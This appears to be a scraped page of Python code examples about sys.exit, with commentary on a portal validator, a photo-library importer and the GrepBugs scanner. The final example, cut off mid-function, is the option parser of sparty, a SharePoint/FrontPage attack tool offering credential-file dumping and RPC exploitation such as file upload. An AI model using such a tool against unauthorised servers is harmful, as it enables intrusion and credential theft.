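    # report missing required options on stderr and exit nonzero
    if opts.key_pair is None:
        print("ERROR: Must provide a key pair name (-k) to use on instances.",
              file=sys.stderr)
        sys.exit(1)
    if opts.profile is None:
        print("ERROR: Must provide an instance profile (-p).", file=sys.stderr)
        sys.exit(1)
    return opts

if __name__ == "__main__":
    opts = parse_opts()
    print("Launching with key pair", opts.key_pair)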

Example 39

View license
def main():
    exit_err_code = 1
    
    # Print/get script arguments
    results = print_args()
    if not results:
        sys.exit(exit_err_code)
    portal_address, adminuser, password = results
    
    total_success = True
    title_break_count = 100
    section_break_count = 75
    search_query = None
    
    print '=' * title_break_count
    print 'Validate Hosted Service Sources'
    print '=' * title_break_count
    
    source_items = []
    hosted_items = []
    
    root_folder_path = None
    root_folder_path = tempfile.mkdtemp()
    print 'Temporary directory: {}'.format(root_folder_path)
    
    orig_dir = os.getcwd()
    
    try:
        portal = Portal(portal_address, adminuser, password)
        items = portal.search()
        
        # ---------------------------------------------------------------------
        #  Get info about hosted service source items
        # (currently service definitions)
        # ---------------------------------------------------------------------
        
        for item in items:
            
            if item['type'] == 'Service Definition':
                
                print '\nDownloading and extracting Service Definition item {}'.format(item['id'])
                
                # Download .sd file
                download_root_path = os.path.join(root_folder_path, item['id'])
                os.mkdir(download_root_path)
                download_path = portal.item_datad(item['id'], download_root_path)
                
                # Extract serviceconfiguration.json file from downloaded .sd file
                file_name = 'serviceconfiguration.json'
                extract_path = download_path.replace('.sd', '')
                #print extract_path
                os.mkdir(extract_path)
                err_stat = extractFromSDFile(download_path, extract_path, file_name)
                print 'Extract status: {}'.format(err_stat)
        
                # Open extract .json file
                file_path = findFilePath(extract_path, file_name)
                os.chdir(os.path.dirname(file_path))
                service_config = json.load(open(file_name))
                
                # [{id: val, owner: val, title: val, type: val
                # service_config: {stuff from .json file}}]
                d = {
                    'id': item['id'],
                    'owner': item['owner'],
                    'title': item['title'],
                    'type': item['type'],
                    'service_config': service_config
                    }
                source_items.append(d)

        # ---------------------------------------------------------------------
        # Get info about hosted service items
        # ---------------------------------------------------------------------
        print '\nDetermine what hosted services exist...'
        h_service_items = get_hosted_service_items(portal, items)
        
        for item in h_service_items:
            d = {
                'id': item['id'],
                'owner': item['owner'],
                'title': item['title'],
                'type': item['type'],
                'url': item['url']
                }
            hosted_items.append(d)

        # ---------------------------------------------------------------------
        # For each hosted service find the associated source item
        # ---------------------------------------------------------------------
        print '=' * section_break_count
        print '\nDetermine which source items are associated with each hosted service...'
        print '=' * section_break_count
        num_hosted_no_match = 0
        num_hosted_match = 0
        num_hosted_mismatch_owner = 0
        write_str = "\tid: {:<34}owner: {:<20}type: {:<25}service: {:<50}\n"
        
        for hosted_d in hosted_items:
            found = False
            found_num = 0
            
            # Get last components of URL (i.e., SRTM_V2_56020/FeatureServer)
            hosted_url = '/'.join(hosted_d['url'].split('/')[-2:])
            
            print '\n{}'.format('-' * 100)
            print 'Hosted Service Item:   Title - "{}"\n'.format(hosted_d['title'])
            
            hosted_str = write_str.format(
                hosted_d['id'],
                hosted_d['owner'],
                hosted_d['type'],
                hosted_url)
            print hosted_str
            
            # Look for match in source items
            print '\tMatching Source Item:'

            for source_d in source_items:
                src_service_info = source_d['service_config']['service']
                src_service_name = src_service_info['serviceName']
                src_service_type = src_service_info['type']
                src_service_url = '{}/{}'.format(src_service_name, src_service_type)
                if hosted_url == src_service_url:
                    found = True
                    found_num += 1
        
                    match_str = write_str.format(
                        source_d['id'],
                        source_d['owner'],
                        source_d['type'],
                        src_service_url)
                    print '\n\tTitle: "{}"'.format(source_d['title'])
                    print match_str
                    
                    if source_d['owner'] != hosted_d['owner']:
                        print '*** ERROR: owner does not match hosted service item owner.'
                        num_hosted_mismatch_owner += 1
                        
            if found_num == 0:
                print '*** ERROR: no matching source item found.'
            if found_num > 1:
                print '*** ERROR: more than one matching source item was found.'
                
            if found:
                num_hosted_match += 1
            else:
                num_hosted_no_match += 1
    

        # ---------------------------------------------------------------------
        # For each source item find the associated hosted service
        # ---------------------------------------------------------------------
        print '=' * section_break_count
        print '\nDetermine which hosted services are associated with each source item...'
        print '=' * section_break_count
        num_source_no_match = 0
        num_source_match = 0
        num_source_mismatch_owner = 0
        write_str = "\tid: {:<34}owner: {:<20}type: {:<25}service: {:<50}\n"
        
        for source_d in source_items:
            found = False
            found_num = 0
        
            src_service_info = source_d['service_config']['service']
            src_service_name = src_service_info['serviceName']
            src_service_type = src_service_info['type']
            src_service_url = '{}/{}'.format(src_service_name, src_service_type)
                
                
            print '\n{}'.format('-' * 100)
            print 'Source Item:   Title - "{}"\n'.format(source_d['title'])
            
            source_str = write_str.format(
                source_d['id'],
                source_d['owner'],
                source_d['type'],
                src_service_url)
            print source_str
            
            # Look for match in source items
            print '\tMatching Hosted Service:'
        
            for hosted_d in hosted_items:
        
                # Get last components of URL (i.e., SRTM_V2_56020/FeatureServer)
                hosted_url = '/'.join(hosted_d['url'].split('/')[-2:])
            
                if hosted_url == src_service_url:
                    found = True
                    found_num += 1
        
                    match_str = write_str.format(
                        hosted_d['id'],
                        hosted_d['owner'],
                        hosted_d['type'],
                        hosted_url)
                    print '\n\tTitle: "{}"'.format(hosted_d['title'])
                    print match_str
            
                    if hosted_d['owner'] != source_d['owner']:
                        print '*** ERROR: owner does not match associated source owner.'
                        num_source_mismatch_owner += 1
                        
            if found_num == 0:
                print '*** ERROR: no matching hosted service found.'
            if found_num > 1:
                print '*** ERROR: more than one matching hosted service was found.'
                
            if found:
                num_source_match += 1
            else:
                num_source_no_match += 1

        print '\n{}'.format('=' * section_break_count)
        print 'Summary:\n'
        print 'Number of hosted services: {}'.format(len(hosted_items))
        print 'With matching source item: {}'.format(num_hosted_match)
        print 'With NO matching source item: {}'.format(num_hosted_no_match)
        print 'With mis-matching owners: {}'.format(num_hosted_mismatch_owner)

        print '\nNumber of source items: {}'.format(len(source_items))
        print 'With matching hosted service: {}'.format(num_source_match)
        print 'With NO matching hosted service: {}'.format(num_source_no_match)        
        print 'With mis-matching owners: {}'.format(num_source_mismatch_owner)
        
    except:
        total_success = False
        
        # Get the traceback object
        tb = sys.exc_info()[2]
        tbinfo = traceback.format_tb(tb)[0]
     
        # Concatenate information together concerning the error 
        # into a message string
        pymsg = "PYTHON ERRORS:\nTraceback info:\n" + tbinfo + \
                "\nError Info:\n" + str(sys.exc_info()[1])
        
        # Print Python error messages for use in Python / Python Window
        print
        print "***** ERROR ENCOUNTERED *****"
        print pymsg + "\n"
        
    finally:
        os.chdir(orig_dir)
        if root_folder_path:
            shutil.rmtree(root_folder_path)
            
        print '\nDone.'
        if total_success:
            sys.exit(0)
        else:
            sys.exit(exit_err_code)
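
The part of this example worth copying is how the exit status is decided: all work happens inside try/except, the temporary directory is always removed in finally, and only then does the script call sys.exit(0) on success or sys.exit(exit_err_code) on failure. A minimal sketch of that skeleton; run_checks() is a hypothetical stand-in for the portal validation above.

import shutil
import sys
import tempfile
import traceback

EXIT_ERR_CODE = 1

def run_checks(tmp_dir):
    # hypothetical placeholder for the real validation work
    print("working in", tmp_dir)

def main():
    success = True
    tmp_dir = tempfile.mkdtemp()
    try:
        run_checks(tmp_dir)
    except Exception:
        success = False
        print("***** ERROR ENCOUNTERED *****")
        traceback.print_exc()
    finally:
        # clean up no matter what, then report the outcome via the exit code
        shutil.rmtree(tmp_dir, ignore_errors=True)
        print("Done.")
        sys.exit(0 if success else EXIT_ERR_CODE)

if __name__ == "__main__":
    main()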

Example 40

View license
def import_photos(iphoto_dir, shotwell_db, photos_dir):
    # Sanity check the iPhoto dir and Shotwell DB.
    _log.debug("Performing sanity checks on iPhoto and Shotwell DBs.")
    now = int(time.time())
    album_data_filename = join_path(iphoto_dir, "AlbumData.xml")
    if not os.path.exists(album_data_filename):
        _log.error("Failed to find expected file inside iPhoto library: %s", 
                   album_data_filename)
        sys.exit(1)
    if not os.path.exists(shotwell_db):
        _log.error("Shotwell DB not found at %s", shotwell_db)
        sys.exit(2)
    db = sqlite3.connect(shotwell_db) #@UndefinedVariable
    with db:
        cursor = db.execute("SELECT schema_version from VersionTable;")
        schema_version = cursor.fetchone()[0]
        if schema_version not in SUPPORTED_SHOTWELL_SCHEMAS:
            _log.error("Shotwell DB uses unsupported schema version %s. "
                       "Giving up, just to be safe.", schema_version)
            sys.exit(3)
        _log.debug("Sanity checks passed.")
        
        # Back up the Shotwell DB.
        fmt_now = time.strftime('%Y-%m-%d_%H%M%S')
        db_backup = "%s.iphotobak_%s" % (shotwell_db, fmt_now)
        _log.debug("Backing up shotwell DB to %s", db_backup)
        shutil.copy(shotwell_db, db_backup)
        _log.debug("Backup complete")
        
        # Load and parse the iPhoto DB.
        _log.debug("Loading the iPhoto library file. Might take a while for a large DB!")
        album_data = plistlib.readPlist(album_data_filename)
        _log.debug("Finished loading the iPhoto library.")
        path_prefix = album_data["Archive Path"]
        def fix_prefix(path, new_prefix=iphoto_dir):
            if path:
                if path[:len(path_prefix)] != path_prefix:
                    raise AssertionError("Path %s didn't begin with %s" % (path, path_prefix))
                path = path[len(path_prefix):]
                path = join_path(new_prefix, path.strip(os.path.sep)) 
            return path
        photos = {} # Map from photo ID to photo info.
        copy_queue = []
        
#                  id = 224
#            filename = /home/shaun/Pictures/Photos/2008/03/24/DSCN2416 (Modified (2)).JPG
#               width = 1600
#              height = 1200
#            filesize = 480914
#           timestamp = 1348718403
#       exposure_time = 1206392706
#         orientation = 1
#original_orientation = 1
#           import_id = 1348941635
#            event_id = 3
#     transformations = 
#                 md5 = 3ca3cf05312d0c1a4c141bb582fc43d0
#       thumbnail_md5 = 
#            exif_md5 = cec27a47c34c89f571c0fd4e9eb4a9fe
#        time_created = 1348941635
#               flags = 0
#              rating = 0
#         file_format = 0
#               title = 
#           backlinks = 
#     time_reimported = 
#         editable_id = 1
#      metadata_dirty = 1
#           developer = SHOTWELL
# develop_shotwell_id = -1
#   develop_camera_id = -1
# develop_embedded_id = -1
        skipped = []
        for key, i_photo in album_data["Master Image List"].items():
            mod_image_path = fix_prefix(i_photo.get("ImagePath", None))
            orig_image_path = fix_prefix(i_photo.get("OriginalPath", None))
            
            new_mod_path = fix_prefix(i_photo.get("ImagePath"), new_prefix=photos_dir)
            new_orig_path = fix_prefix(i_photo.get("OriginalPath", None), 
                                       new_prefix=photos_dir)
            
            if not orig_image_path or not os.path.exists(mod_image_path):
                orig_image_path = mod_image_path
                new_orig_path = new_mod_path
                new_mod_path = None
                mod_image_path = None
                mod_file_size = None
            else:
                mod_file_size = os.path.getsize(mod_image_path)
                
            if not os.path.exists(orig_image_path):
                _log.error("Original file not found %s", orig_image_path)
                skipped.append(orig_image_path)
                continue
            
            copy_queue.append((orig_image_path, new_orig_path))
            if mod_image_path: copy_queue.append((mod_image_path, new_mod_path))
                
            mime, _ = mimetypes.guess_type(orig_image_path)
                
            sys.stdout.write('.')
            sys.stdout.flush()
            if mime not in ("image/jpeg", "image/png", "image/x-ms-bmp", "image/tiff"):
                print
                _log.error("Skipping %s, it's not an image %s", orig_image_path, mime)
                skipped.append(orig_image_path)
                continue
            
            caption = i_photo.get("Caption", "")
            
            img = Image.open(orig_image_path)
            w, h = img.size
            
            md5 = md5_for_file(orig_image_path)
            orig_timestamp = int(os.path.getmtime(orig_image_path))
            
            mod_w, mod_h, mod_md5, mod_timestamp = None, None, None, None
            if mod_image_path:
                try:
                    mod_img = Image.open(mod_image_path)
                except Exception:
                    _log.error("Failed to open modified image %s, skipping", mod_image_path)
                    orig_image_path = mod_image_path
                    new_orig_path = new_mod_path
                    new_mod_path = None
                    mod_image_path = None
                    mod_file_size = None
                else:
                    mod_w, mod_h = mod_img.size
                    mod_md5 = md5_for_file(mod_image_path)
                    mod_timestamp = int(os.path.getmtime(mod_image_path))
            
            file_format = FILE_FORMAT.get(mime, -1)
            if file_format == -1:
                raise Exception("Unknown image type %s" % mime)
            
            photo = {"orig_image_path": orig_image_path,
                           "mod_image_path": mod_image_path,
                           "new_mod_path": new_mod_path,
                           "new_orig_path": new_orig_path,
                           "orig_file_size": os.path.getsize(orig_image_path),
                           "mod_file_size": mod_file_size,
                           "mod_timestamp": mod_timestamp,
                           "orig_timestamp": orig_timestamp,
                           "caption": caption,
                           "rating": i_photo["Rating"],
                           "event": i_photo["Roll"],
                           "orig_exposure_time": int(parse_date(i_photo["DateAsTimerInterval"])),
                           "width": w,
                           "height": h,
                           "mod_width": mod_w,
                           "mod_height": mod_h,
                           "orig_md5": md5,
                           "mod_md5": md5,
                           "file_format": file_format,
                           "time_created": now,
                           "import_id": now,
                           }
            def read_metadata(path, photo, prefix="orig_"):
                photo[prefix + "orientation"] = 1
                photo[prefix + "original_orientation"] = 1
                try:
                    meta = ImageMetadata(path)
                    meta.read()
                    try:
                        photo[prefix + "orientation"] = meta["Exif.Image.Orientation"].value
                        photo[prefix + "original_orientation"] = meta["Exif.Image.Orientation"].value
                    except KeyError:
                        print
                        _log.debug("Failed to read the orientation from %s" % path)
                    exposure_dt = meta["Exif.Image.DateTime"].value
                    photo[prefix + "exposure_time"] = exif_datetime_to_time(exposure_dt)
                except KeyError:
                    pass
                except Exception:
                    print
                    _log.exception("Failed to read date from %s", path)
                    raise
                    
            try:
                read_metadata(orig_image_path, photo, "orig_")
                photo["orientation"] = photo["orig_orientation"]
                if mod_image_path:
                    read_metadata(mod_image_path, photo, "mod_")
                    photo["orientation"] = photo["mod_orientation"]
            except Exception:
                _log.error("**** Skipping %s" % orig_image_path)
                skipped.append(orig_image_path)
                continue
            
            photos[key] = photo
        
        events = {}
        for event in album_data["List of Rolls"]:
            key = event["RollID"]
            events[key] = {
                "date": parse_date(event["RollDateAsTimerInterval"]),
                "key_photo": event["KeyPhotoKey"], 
                "photos": event["KeyList"],
                "name": event["RollName"]
            }
            for photo_key in event["KeyList"]:
                assert photo_key not in photos or photos[photo_key]["event"] == key
        
        # Insert into the Shotwell DB.
        for _, event in events.items():
            c = db.execute("""
                INSERT INTO EventTable (time_created, name) 
                VALUES (?, ?)
            """, (event["date"], event["name"]))
            assert c.lastrowid is not None
            event["row_id"] = c.lastrowid
            for photo_key in event["photos"]:
                if photo_key in photos:
                    photos[photo_key]["event_id"] = event["row_id"]

        
            
        for key, photo in photos.items():
            # The BackingPhotoTable
#                  id = 1
#            filepath = /home/shaun/Pictures/Photos/2008/03/24/DSCN2416 (Modified (2))_modified.JPG
#           timestamp = 1348968706
#            filesize = 1064375
#               width = 1600
#              height = 1200
#original_orientation = 1
#         file_format = 0
#        time_created = 1348945103
            if "event_id" not in photo:
                _log.error("Photo didn't have an event: %s", photo)
                skipped.append(photo["orig_image_path"])
                continue
            editable_id = -1
            if photo["mod_image_path"] is not None:
                # This photo has a backing image
                c = db.execute("""
                    INSERT INTO BackingPhotoTable (filepath,
                                                   timestamp,
                                                   filesize,
                                                   width,
                                                   height,
                                                   original_orientation,
                                                   file_format,
                                                   time_created)
                    VALUES (:new_mod_path,
                            :mod_timestamp,
                            :mod_file_size,
                            :mod_width,
                            :mod_height,
                            :mod_original_orientation,
                            :file_format,
                            :time_created)
                """, photo)
                editable_id = c.lastrowid
            
            photo["editable_id"] = editable_id
            try:
                c = db.execute("""
                    INSERT INTO PhotoTable (filename,
                                            width,
                                            height,
                                            filesize,
                                            timestamp,
                                            exposure_time,
                                            orientation,
                                            original_orientation,
                                            import_id,
                                            event_id,
                                            md5,
                                            time_created,
                                            flags,
                                            rating,
                                            file_format,
                                            title,
                                            editable_id,
                                            metadata_dirty,
                                            developer,
                                            develop_shotwell_id,
                                            develop_camera_id,
                                            develop_embedded_id)
                    VALUES (:new_orig_path,
                            :width,
                            :height,
                            :orig_file_size,
                            :orig_timestamp,
                            :orig_exposure_time,
                            :orientation,
                            :orig_original_orientation,
                            :import_id,
                            :event_id,
                            :orig_md5,
                            :time_created,
                            0,
                            :rating,
                            :file_format,
                            :caption,
                            :editable_id,
                            1,
                            'SHOTWELL',
                            -1,
                            -1,
                            -1);
                """, photo)
            except Exception:
                _log.exception("Failed to insert photo %s" % photo)
                raise
            
        print >> sys.stderr, "Skipped importing these files:\n", "\n".join(skipped)
        print >> sys.stderr, "%s files skipped (they will still be copied)" % len(skipped)
        
        for src, dst in copy_queue:
            safe_link_file(src, dst)
        
        db.commit()
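
import_photos front-loads its sanity checks and gives each failure its own exit status (1 for a missing AlbumData.xml, 2 for a missing Shotwell DB, 3 for an unsupported schema), which lets whatever shell script drives the migration see exactly which precondition failed. A minimal sketch of that pattern; the supported schema versions below are placeholders, not the ones the script actually accepts.

import logging
import os
import sqlite3
import sys

# placeholder values -- the real script defines SUPPORTED_SHOTWELL_SCHEMAS elsewhere
SUPPORTED_SCHEMAS = (16, 20)
_log = logging.getLogger(__name__)

def sanity_check(iphoto_dir, shotwell_db):
    album = os.path.join(iphoto_dir, "AlbumData.xml")
    if not os.path.exists(album):
        _log.error("Missing iPhoto library file: %s", album)
        sys.exit(1)
    if not os.path.exists(shotwell_db):
        _log.error("Shotwell DB not found at %s", shotwell_db)
        sys.exit(2)
    with sqlite3.connect(shotwell_db) as db:
        (version,) = db.execute("SELECT schema_version FROM VersionTable;").fetchone()
    if version not in SUPPORTED_SCHEMAS:
        _log.error("Unsupported Shotwell schema version %s; giving up.", version)
        sys.exit(3)

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    sanity_check(sys.argv[1], sys.argv[2])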

Example 41

Project: GrepBugs
Source File: grepbugs.py
View license
def local_scan(srcdir, repo='none', account='local_scan', project='none', default_branch='none', no_reports=False):
	"""
	Perform a scan of local files
	"""
	# new scan so new scan_id
	scan_id = str(uuid.uuid1())
	clocsql = '/tmp/gb.cloc.' + scan_id + '.sql'
	basedir = os.path.dirname(os.path.abspath(__file__)) + '/' + srcdir.rstrip('/')
	logging.info('Using grep binary ' + grepbin)
	logging.info('Starting local scan with scan id ' + scan_id)

	# get db connection
	if 'mysql' == gbconfig.get('database', 'database'):
		try:
			import MySQLdb
			mysqldb  = MySQLdb.connect(host=gbconfig.get('database', 'host'), user=gbconfig.get('database', 'dbuname'), passwd=gbconfig.get('database', 'dbpword'), db=gbconfig.get('database', 'dbname'))
			mysqlcur = mysqldb.cursor()
		except Exception as e:
			print 'Error connecting to MySQL! See log file for details.'
			logging.debug('Error connecting to MySQL: ' + str(e))
			sys.exit(1)

	try:
		db  = lite.connect(dbfile)
		cur = db.cursor()

	except lite.Error as e:
		print 'Error connecting to db file! See log file for details.'
		logging.debug('Error connecting to db file: ' + str(e))
		sys.exit(1)
	except Exception as e:
		print 'CRITICAL: Unhandled exception occurred! Quitters gonna quit! See log file for details.'
		logging.critical('Unhandled exception: ' + str(e))
		sys.exit(1)

	if args.u == True:
		print 'Scanning with existing rules set'
		logging.info('Scanning with existing rules set')
	else:
		# get latest greps
		download_rules()

	# prep db for capturing scan results
	try:
		# clean database
		cur.execute("DROP TABLE IF EXISTS metadata;");
		cur.execute("DROP TABLE IF EXISTS t;");
		cur.execute("VACUUM");

		# update database with new project info
		if 'none' == project:
			project = srcdir

		# query database
		params     = [repo, account, project]
		if 'mysql' == gbconfig.get('database', 'database'):
			mysqlcur.execute("SELECT project_id FROM projects WHERE repo=%s AND account=%s AND project=%s LIMIT 1;", params)
			rows = mysqlcur.fetchall()
		else:
			cur.execute("SELECT project_id FROM projects WHERE repo=? AND account=? AND project=? LIMIT 1;", params)
			rows = cur.fetchall()

		# assume new project by default
		newproject = True

		for row in rows:
			# not so fast, not a new project
			newproject = False
			project_id = row[0]

		if True == newproject:
			project_id = str(uuid.uuid1())
			params     = [project_id, repo, account, project, default_branch]
			if 'mysql' == gbconfig.get('database', 'database'):
				mysqlcur.execute("INSERT INTO projects (project_id, repo, account, project, default_branch) VALUES (%s, %s, %s, %s, %s);", params)
			else:
				cur.execute("INSERT INTO projects (project_id, repo, account, project, default_branch) VALUES (?, ?, ?, ?, ?);", params)

		# update database with new scan info
		params  = [scan_id, project_id]
		if 'mysql' == gbconfig.get('database', 'database'):
			mysqlcur.execute("INSERT INTO scans (scan_id, project_id) VALUES (%s, %s);", params)
			mysqldb.commit()
		else:
			cur.execute("INSERT INTO scans (scan_id, project_id) VALUES (?, ?);", params)
			db.commit()

	except Exception as e:
		print 'CRITICAL: Unhandled exception occurred! Quitters gonna quit! See log file for details.'
		logging.critical('Unhandled exception: ' + str(e))
		sys.exit(1)

	# execute cloc to get sql output
	try:
		print 'counting source files...'
		logging.info('Running cloc for sql output.')
		return_code = call(["cloc", "--skip-uniqueness", "--quiet", "--sql=" + clocsql, "--sql-project=" + srcdir, srcdir])
		if 0 != return_code:
			logging.debug('WARNING: cloc did not run normally. return code: ' + str(return_code))

		# run sql script generated by cloc to save output to database
		f = open(clocsql, 'r')
		cur.executescript(f.read())
		db.commit()
		f.close()
		os.remove(clocsql)

	except Exception as e:
		print 'Error executing cloc sql! Aborting scan! See log file for details.'
		logging.debug('Error executing cloc sql (scan aborted). It is possible there were no results from running cloc.: ' + str(e))
		return scan_id

	# query cloc results
	cur.execute("SELECT Language, count(File), SUM(nBlank), SUM(nComment), SUM(nCode) FROM t GROUP BY Language ORDER BY Language;")
	
	rows    = cur.fetchall()
	cloctxt =  '-------------------------------------------------------------------------------' + "\n"
	cloctxt += 'Language                     files          blank        comment           code' + "\n"
	cloctxt += '-------------------------------------------------------------------------------' + "\n"
	
	sum_files   = 0
	sum_blank   = 0
	sum_comment = 0
	sum_code    = 0

	for row in rows:
		cloctxt += '{0:20}  {1:>12}  {2:>13} {3:>14} {4:>14}'.format(str(row[0]), str(row[1]), str(row[2]), str(row[3]), str(row[4])) + "\n"
		sum_files   += row[1]
		sum_blank   += row[2]
		sum_comment += row[3]
		sum_code    += row[4]
	
	cloctxt += '-------------------------------------------------------------------------------' + "\n"
	cloctxt += '{0:20}  {1:>12}  {2:>13} {3:>14} {4:>14}'.format('Sum', str(sum_files), str(sum_blank), str(sum_comment), str(sum_code)) + "\n"
	cloctxt += '-------------------------------------------------------------------------------' + "\n"

	# save cloc txt summary to the database
	try:
		params = [cloctxt, scan_id]
		if 'mysql' == gbconfig.get('database', 'database'):
			mysqlcur.execute("UPDATE scans SET date_time=NOW(), cloc_out=%s WHERE scan_id=%s;", params)
			mysqldb.commit()
		else:
			cur.execute("UPDATE scans SET cloc_out=? WHERE scan_id=?;", params)
			db.commit()

	except Exception as e:
		print 'Error saving cloc txt! Aborting scan! See log file for details.'
		logging.debug('Error saving cloc txt (scan aborted): ' + str(e))
		return scan_id

	# load json data
	try:
		logging.info('Reading grep rules from json file.')
		json_file = open(gbfile, "r")
		greps     = json.load(json_file)
		json_file.close()
	except Exception as e:
		print 'CRITICAL: Unhandled exception occurred! Quitters gonna quit! See log file for details.'
		logging.critical('Unhandled exception: ' + str(e))
		sys.exit(1)

	# query database
	cur.execute("SELECT DISTINCT Language FROM t ORDER BY Language;")
	rows = cur.fetchall()

	# grep all the bugs and output to file
	print 'grepping for bugs...'
	logging.info('Start grepping for bugs.')

	# get cloc extensions and create extension array
	clocext  = ''
	proc     = subprocess.Popen([clocbin, "--show-ext"], stdout=subprocess.PIPE)
	ext      = proc.communicate()
	extarray = str(ext[0]).split("\n")
	
	# override some extensions
	extarray.append('inc -> PHP')
	
	# loop through languages identified by cloc
	for row in rows:
		count = 0
		# loop through all grep rules for each language identified by cloc
		for i in range(0, len(greps)):
				# if the language matches a language in the gb rules file then do stuff
				if row[0] == greps[i]['language']:

					# get all applicable extensions based on language
					extensions = []
					for ii in range(0, len(extarray)):
						lang = str(extarray[ii]).split("->")
						if len(lang) > 1:							
							if str(lang[1]).strip() == greps[i]['language']:
								extensions.append(str(lang[0]).strip())

					# search with regex, filter by extensions, and capture result
					result = ''
					filter = []

					# build filter by extension
					for e in extensions:
						filter.append('--include=*.' + e)

					try:
						proc   = subprocess.Popen([grepbin, "-n", "-r", "-P"] +  filter + [greps[i]['regex'], srcdir], stdout=subprocess.PIPE)
						result = proc.communicate()

						if len(result[0]):	
							# update database with new results info
							result_id = str(uuid.uuid1())
							params    = [result_id, scan_id, greps[i]['language'], greps[i]['id'], greps[i]['regex'], greps[i]['description']]
							if 'mysql' == gbconfig.get('database', 'database'):
								mysqlcur.execute("INSERT INTO results (result_id, scan_id, language, regex_id, regex_text, description) VALUES (%s, %s, %s, %s, %s, %s);", params)
								mysqldb.commit()
							else:
								cur.execute("INSERT INTO results (result_id, scan_id, language, regex_id, regex_text, description) VALUES (?, ?, ?, ?, ?, ?);", params)
								db.commit()

							perline = str(result[0]).split("\n")
							for r in range(0, len(perline) - 1):
								try:
									rr = str(perline[r]).replace(basedir, '').split(':', 1)
									# update database with new results_detail info
									result_detail_id = str(uuid.uuid1())
									code             = str(rr[1]).split(':', 1)
									params           = [result_detail_id, result_id, rr[0], code[0], str(code[1]).strip()]

									if 'mysql' == gbconfig.get('database', 'database'):
										mysqlcur.execute("INSERT INTO results_detail (result_detail_id, result_id, file, line, code) VALUES (%s, %s, %s, %s, %s);", params)
										mysqldb.commit()
									else:
										cur.execute("INSERT INTO results_detail (result_detail_id, result_id, file, line, code) VALUES (?, ?, ?, ?, ?);", params)
										db.commit()

								except lite.Error, e:
									print 'SQL error! See log file for details.'
									logging.debug('SQL error with params ' + str(params) + ' and error ' + str(e))
								except Exception as e:
									print 'Error parsing result! See log file for details.'
									logging.debug('Error parsing result: ' + str(e))
							
					except Exception as e:
						print 'Error calling grep! See log file for details'
						logging.debug('Error calling grep: ' + str(e))

	params = [project_id]
	if 'mysql' == gbconfig.get('database', 'database'):
		mysqlcur.execute("UPDATE projects SET last_scan=NOW() WHERE project_id=%s;", params)
		mysqldb.commit()
		mysqldb.close()
	else:
		cur.execute("UPDATE projects SET last_scan=datetime('now') WHERE project_id=?;", params)
		db.commit()
		db.close()

	if not no_reports:
		html_report(scan_id)

	return scan_id
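
local_scan treats a failed database connection as fatal: the user gets a one-line message, the details go to the log, and sys.exit(1) stops the scan before any results could be half-written. A minimal sketch of that connect-or-exit step on its own; the file names are hypothetical.

import logging
import sqlite3 as lite
import sys

logging.basicConfig(filename="grepbugs.log", level=logging.DEBUG)

def connect(dbfile="grepbugs.db"):
    try:
        db = lite.connect(dbfile)
        return db, db.cursor()
    except lite.Error as e:
        # short message for the user, full detail in the log, nonzero exit
        print("Error connecting to db file! See log file for details.")
        logging.debug("Error connecting to db file: %s", e)
        sys.exit(1)

if __name__ == "__main__":
    db, cur = connect()
    print("Connected to", db)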

Example 42

Project: sparty
Source File: sparty_v_0.1.py
View license
def main():
    check_python()
    banner()

    parser = optparse.OptionParser(usage="usage: %prog [options]", version="%prog 1.0")

    front_page = optparse.OptionGroup(parser,"Frontpage:")
    share_point = optparse.OptionGroup(parser,"Sharepoint:")
    mandatory = optparse.OptionGroup(parser,"Mandatory:")
    exploit = optparse.OptionGroup(parser,"Information Gathering and Exploit:")
    authentication = optparse.OptionGroup(parser,"Authentication [devalias.net]")
    general = optparse.OptionGroup(parser,"General:")

    mandatory.add_option("-u","--url", type="string" , help="target url to scan with proper structure", dest="url")
    front_page.add_option("-f", "--frontpage", type="choice", choices=['pvt' ,'bin'], help="<FRONTPAGE = pvt | bin> -- to check access permissions on frontpage standard files in vti or bin directory!", dest="frontpage")
    share_point.add_option("-s","--sharepoint", type="choice", choices=['forms','layouts','catalog'], help="<SHAREPOINT = forms | layouts | catalog> -- to check access permissions on sharepoint standard files in forms or layouts or catalog directory!", dest="sharepoint")

    exploit.add_option("-v","--http_fingerprint", type="choice", choices=['ms_sharepoint','ms_frontpage'], help="<FINGERPRINT = ms_sharepoint | ms_frontpage> -- fingerprint sharepoint or frontpage based on HTTP headers!" , dest="fingerprint")
    exploit.add_option("-d","--dump", type="choice", choices=['dump', 'extract'] , help="<DUMP = dump | extract> -- dump credentials from default sharepoint and frontpage files (configuration errors and exposed entries)!", dest="dump")
    exploit.add_option("-l","--list", type="choice", choices=['list','index'], help="<DIRECTORY = list | index> -- check directory listing and permissions!", dest="directory")
    exploit.add_option("-e","--exploit", type="choice", choices=['rpc_version_check','rpc_service_listing', 'author_config_check','rpc_file_upload','author_remove_folder'], help="EXPLOIT = <rpc_version_check | rpc_service_listing | rpc_file_upload | author_config_check | author_remove_folder> -- exploit vulnerable installations by checking RPC querying, service listing and file uploading", dest="exploit")
    exploit.add_option("-i","--services", type="choice", choices=['serv','services'], help="SERVICES = <serv | services> -- checking exposed services !", dest="services")

    authentication.add_option("-a","--auth-type", type="choice", choices=['ntlm'], help="AUTHENTICATION = <ntlm> -- Authenticate with NTLM user/pass !", dest="authentication")

    general.add_option("-x","--examples", type="string",help="running usage examples !", dest="examples")

    parser.add_option_group(front_page)
    parser.add_option_group(share_point)
    parser.add_option_group(mandatory)
    parser.add_option_group(exploit)
    parser.add_option_group(authentication)
    parser.add_option_group(general)

    options, arguments = parser.parse_args()

    try:
        target = options.url

        # devalias.net - Authentication
        if options.authentication == "ntlm":
            enable_ntlm_authentication("", "", target) # Leave user/pass blank to prompt user
            # TODO: Enable commandline user/pass?

        if target is not None:
            target_information(target)
        else:
            print "[-] specify the options. use (-h) for more help!"
            sys.exit(0)

        if options.dump=="dump" or options.dump == "extract":
                        print "\n[+]------------------------------------------------------------------------------------------------!"
                        print "[+] dumping (service.pwd | authors.pwd | administrators.pwd | ws_ftp.log) files if possible!"
                        print "[+]--------------------------------------------------------------------------------------------------!\n"
                        dump_credentials(target)
                        module_success("password dumping")
                        return

        elif options.exploit == "rpc_version_check":
                        print "\n[+]-----------------------------------------------------------------------!"
                        print "[+] auditing frontpage RPC service                                          !"
                        print "[+]-------------------------------------------------------------------------!\n"
                        frontpage_rpc_check(target)
                        module_success("module RPC version check")
                        return

        elif options.exploit == "rpc_service_listing":
                        print "\n[+]-----------------------------------------------------------------------!"
                        print "[+] auditing frontpage RPC service for fetching listing                     !"
